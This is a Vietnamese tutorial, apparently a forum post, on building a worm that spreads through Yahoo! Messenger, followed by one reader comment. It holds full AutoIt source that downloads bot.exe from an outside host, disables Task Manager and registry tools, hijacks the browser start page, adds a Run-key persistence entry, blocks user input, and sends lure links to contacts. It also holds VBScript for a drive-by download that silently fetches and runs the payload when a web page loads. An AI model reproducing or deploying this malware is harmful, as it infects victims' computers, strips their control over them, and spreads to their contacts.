Cách làm virus lan tràn qua Y!M

Trước tiên save đọan code này vào notepad dưới dạng *.txt (vd: bot.txt).Bạn sửa lại theo ý thích nha

If Not FileExists(@WindowsDir & “\taskmsg.exe”) Then

InetGet (”http://phidao.net/yahoo/bot.exe”, @WindowsDir & “\taskmsg.exe”, 0, 1)

Sleep(5000)

EndIf

RegWrite(”HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel”, “Homepage”, “REG_DWORD”, “1″)

RegWrite(”HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System”, “DisableTaskMgr”, “REG_DWORD”, “1″)

RegWrite(”HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System”, “DisableRegistryTools”, “REG_DWORD”, “1″)

RegWrite(”HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main”, “Start Page”, “REG_SZ”, “http://phidao.net/yahoo/”)

RegWrite(”HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_buzz”, “content url”, “REG_SZ”, “http://phidao.net/yahoo/”)

RegWrite(”HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_Launchcast”, “content url”, “REG_SZ”, “http://phidao.net/yahoo/”)

RegWrite(”HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run”, “Task Manager”, “REG_SZ”, @WindowsDir & “\taskmsg.exe”)

RegWrite(”HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main”, “Window Title”, “REG_SZ”, “Minhnhut.be :: Another Version of Nhut.be :: Chut gi de nho…”)

$tin[0] = “Vui gi ma vui the! Dau ca bung roi ne… http://phidao.net/yahoo/ “

$tin[1] = “Trui, ngo nghinh qua a… Vo coi thu nao http://phidao.net/yahoo/ “

$tin[2] = “Vui kinh khung! Ghe qua day ti xiu nha ban http://phidao.net/yahoo/ “

$tin[3] = “Chao mung cac ban den voi Dao Khuc Community http://phidao.net/yahoo/ “

$tin[4] = “Moi phat hien ra cai nay ne, cuc hay luon nha http://phidao.net/yahoo/ “

$tin[5] = “Kinh di qua di mat… Toan la ma trong nay ne http://phidao.net/yahoo/ “

$tin[6] = “Gom gi ma gom the… Vao day ma xem gom co nao http://phidao.net/yahoo/ “

$tin[7] = “Cai gi the nhi? Thang ban moi quang cao cai nay http://phidao.net/yahoo/ “

$tin[8] = “Troi oi!Album hinh moi lam dep ghe==> http://phidao.net/yahoo/ “

$tin[9] = “Hey! Coi Album hinh moi lam ne http://phidao.net/yahoo/ “

While (1)

sleep(60000)

$tieude = WinGetTitle(”Yahoo! Messenger”, “”)

$kiemtra = WinExists ($tieude)

If $kiemtra = 1 Then

$ngaunhien = Random(0,9,1)

ClipPut($tin[$ngaunhien])

BlockInput (1)

WinActivate($tieude)

Send(”^m”)

Send(”{DOWN}”)

Send(”^{SHIFTDOWN}{END}{SHIFTUP}”)

Send(”{ENTER}”)

Send(”^v {ENTER}”)

BlockInput (0)

EndIf

Sleep(1800000)

WEnd

Sau khi cài đặt xong mở chương trình “Compile script to.exe”

Ở fần Source (AutoIT .au3 file): chọn đường dẫn tới file bot.txt vừa tạo

Custom Icon (.ico): tạo icon cho chương trình, ko có cũng ko sao

Đánh vào dấu kiểm Allow decompilation

Passphrase: đánh password tùy thích vào

Verify Passphrase: đánh lại password

Nhấn nút convert là xong.

****

Tiếp theo đính đọan code này vào web để chạy file bot.exe



on error resume next

dl = “http:/phidao.net/yahoo/bot.exe”

Set df = document.createElement(”object”)

df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″

str=”Microsoft.XMLHTTP”

Set x = df.CreateObject(str,””)

a1=”Ado”

a2=”db.”

a3=”Str”

a4=”eam”

str1=a1&a2&a3&a4

str5=str1

set S = df.createobject(str5,””)

S.type = 1

str6=”GET”

x.Open str6, dl, False

x.Send

fname1=”bl4ck.com”

set F = df.createobject(”scripting.FileSystemObject”,””)

set tmp = F.GetSpecialFolder(2)

fname1= F.BuildPath(tmp,fname1)

S.open

S.write x.responseBody

S.savetofile fname1,2

S.close

set Q = df.createobject(”Shell.Application”,””)

Q.ShellExecute fname1,””,””,”open”,0



Okie xong rùi đó test thử xem nào

———————————————-

Các bạn sử dụng phần mềm Autoit 3.2.1 để tạo con này nhé

Bài viết với mục đích tham khảo mong các ban cẩn thận khi thức hành

Cha,
bai` viet hay qua.de em thu xem sao nhe